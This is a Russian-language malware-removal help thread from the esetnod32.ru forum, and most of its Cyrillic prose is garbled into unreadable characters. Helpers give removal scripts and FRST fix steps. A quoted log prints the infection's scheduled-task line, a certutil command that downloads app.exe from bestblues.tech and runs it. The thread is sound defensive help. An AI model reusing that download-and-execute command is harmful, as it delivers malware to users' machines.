�� esetnod32.ru [��: �� ARP]

�� ARP

Sat, 30 Jan 2021 12:27:43 +0300

�� ARP ��  � �� .
�� :)
30.01.2021 12:27:43, RP55 RP55.

�� ARP

Sat, 30 Jan 2021 12:21:54 +0300

�� ARP ��  � �� .
�� . ��
30.01.2021 12:21:54, Ramzi Sadigli.

�� ARP

Sat, 30 Jan 2021 11:15:08 +0300

�� ARP ��  � �� .

====quote====
Ramzi Sadigli ��:
� �� : �� Ace Stream
=============

� �� .
https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc86511a0e4e00248a/detection

====code====

������ ���      HTTPS://BESTBLUES.TECH/APP/APP.EXE
��� �����                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
���. ������                  ��������������                     
                            
����������� ����������      �� ������ �������� ������
������                      
                            
���. ����������             �� ������ ���������� ������
����                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
������ �� ������            
������                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
������                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}

=============

+

====code====

������ ���                  C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
��� �����                   SCHEDULED.EXE
���. ������                  �������������� 
                            
                           
����������� ����������      �� ������ �������� ������
������                      �������������� 
���. � �����                �� ������� ����� ��������� ����. 
����. �������               �������� �� �������������
                            
������                      �������������� ������
���� �� �����               ������� ��� ������� � �������
                            
���. ����������             �� ������ ���������� ������
����                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
������ �� ������            
������                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
������                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\

=============
30.01.2021 11:15:08, RP55 RP55.

�� ARP

Sat, 30 Jan 2021 11:07:07 +0300

�� ARP ��  � �� .
� �� : �� Ace Stream Media Center � Ace Stream Player
Fixlog.txt
30.01.2021 11:07:07, Ramzi Sadigli.

�� ARP

Sat, 30 Jan 2021 10:55:05 +0300

�� ARP ��  � �� .
�� fixlist.txt � �� Farbar Recovery Scan Tool:

�� FRST � �� Fix � ��.

====code====

  

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
Task: {5CA08649-520A-4263-96F3-D10FB12140A9} - \Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask -> No File <==== ATTENTION
FF HKU\S-1-5-21-1895224048-345741818-4275738559-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\RAMZES\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => not found
FF Plugin HKU\S-1-5-21-1895224048-345741818-4275738559-1001: @acestream.net/acestreamplugin,version=3.1.32 -> C:\Users\RAMZES\AppData\Roaming\ACEStream\player\npace_plugin.dll [No File]


EmptyTemp:
Reboot:

=============
�� FRST �� -�� (Fixlog.txt). ��, �� !

�� .
30.01.2021 10:55:05, RP55 RP55.

�� ARP

Sat, 30 Jan 2021 10:48:50 +0300

�� ARP ��  � �� .

====quote====
santy ��:
+
��
C:\USERS\RAMZES\APPDATA\ROAMING\UTORRENT\UTORRENT.EXE
=============
�� ?
30.01.2021 10:48:50, Ramzi Sadigli.

�� ARP

Sat, 30 Jan 2021 10:40:13 +0300

�� ARP ��  � �� .
�� AdwCleaner
��
�� FRST, �� . �� -�� ?
AdwCleaner[S00].txt
AdwCleaner[C00].txt
FRST.txt
30.01.2021 10:40:13, Ramzi Sadigli.

�� ARP

Sat, 30 Jan 2021 10:09:45 +0300

�� ARP ��  � �� .
+
��
C:\USERS\RAMZES\APPDATA\ROAMING\UTORRENT\UTORRENT.EXE
30.01.2021 10:09:45, santy.

�� ARP

Fri, 29 Jan 2021 22:55:01 +0300

�� ARP ��  � �� .
1) �� - � �� .
uVS: start.exe, �� , ��, �� - �� .
�� , �� !
�� : �� !

====code====

;uVS v4.11.3 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delall %SystemDrive%\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\OFFICE15\OLICENSEHEARTBEAT.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemDrive%\PROGRAM FILES (X86)\IOBIT\IOBIT UNINSTALLER\IOBITUNINSTALER.EXE
delref %SystemRoot%\SYSWOW64\VID.DLL
delref %SystemRoot%\SYSWOW64\PEERDISTSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\APPVETWCLIENTRES.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\BTHSERV.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\CSCSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SMBDIRECT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref %SystemRoot%\SYSWOW64\IE4USHOWIE.EXE
delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE
delref P:\LFSERVICE.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\[CLSID]
delref {23170F69-40C1-278A-1000-000100020000}\[CLSID]
delref P:\LF37CONTEXT.DLL
delref {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3}\[CLSID]
delref {B298D29A-A6ED-11DE-BA8C-A68E55D89593}\[CLSID]
delref {4A7C4306-57E0-4C0C-83A9-78C1528F618C}\[CLSID]
delref %SystemDrive%\USERS\RAMZES\APPDATA\LOCAL\MICROSOFT\WINDOWS\WINX\GROUP2\2 - SEARCH.LNK
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref BROWSER\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref P:\BIN\OLSERVICE.EXE
delref P:\BIN\OPCDB.EXE
delref P:\BIN\SYNCAGENTSERVICE.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.442\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE_64.DLL
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %SystemDrive%\PROGRAM FILES\ADOBE\ADOBE ILLUSTRATOR CC 2015\ADOBE ILLUSTRATOR CC\SUPPORT FILES\CONTENTS\WINDOWS\ILLUSTRATOR.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref P:\BIN\SCENEVIEWX.OCX
delref P:\BIN\SDENAVIGATION.DLL
delref P:\BIN\OPCSDE.DLL
delref P:\BIN\SCENEPLUGIN.DLL
delref P:\BIN\PGUEST.DLL
delref P:\BIN\INTEGRATOR.EXE
delref P:\BIN\CURRENTRATING.DLL
delref P:\BIN\SDEDB.DLL
delref P:\BIN\HTSDE2.OCX
delref P:\BIN\HTSDN2.OCX
delref P:\BIN\OPTASK.DLL
delref P:\BIN\OLREPORT.EXE
delref P:\BIN\SPSYNTH.EXE
delref P:\BIN\SWMAN32.EXE
delref P:\BIN\OL.EXE
delref P:\BIN\SDEDIT32.EXE
delref %SystemRoot%\SYSWOW64\TTLSEXT.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref P:\BIN\CADVIEWLIB\CADVIEWLIB.OCX
delref P:\BIN\VXPLIB.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.442\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\PERCEPTIONSIMULATIONEXTENSIONS.DLL
delref P:\BIN\ELMODUS.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref %SystemRoot%\SYSWOW64\LISTSVC.DLL
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemRoot%\SYSWOW64\WBEM\NLMCIM.DLL
delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL
delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref P:\BIN\ABONENTS.DLL
delref P:\BIN\PHOENIXSRV.EXE
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemRoot%\SYSWOW64\WIREDNETWORKCSP.DLL
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DMJBEPBHONBOJPOAENHCKJOCCHGFIAOFO%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://BESTBLUES.TECH/APP/APP.EXE
apply

=============

2) �� AdwCleaner
http://forum.esetnod32.ru/forum9/topic7084/

�� :
�� Mail.Ru � Yandex �� ( �� )
�� :
�� (Folders) �� Mail.Ru � Yandex �� [V]

�� AdwCleaner �� (Clean), ��
� ��

3) �� FRST: http://forum.esetnod32.ru/forum9/topic2798/
29.01.2021 22:55:01, RP55 RP55.

�� ARP

Fri, 29 Jan 2021 21:24:16 +0300

�� ARP ��  � �� .
�� uVS. �� . ��
COMPUTER_2021-01-29_22-08-26_v4.1.3.rar
29.01.2021 21:24:16, Ramzi Sadigli.

����� esetnod32.ru [����: ���������� ����� ����� �������� ������� ���� ARP]

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

���������� ����� ����� �������� ������� ���� ARP

�� esetnod32.ru [��: �� ARP]

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP

�� ARP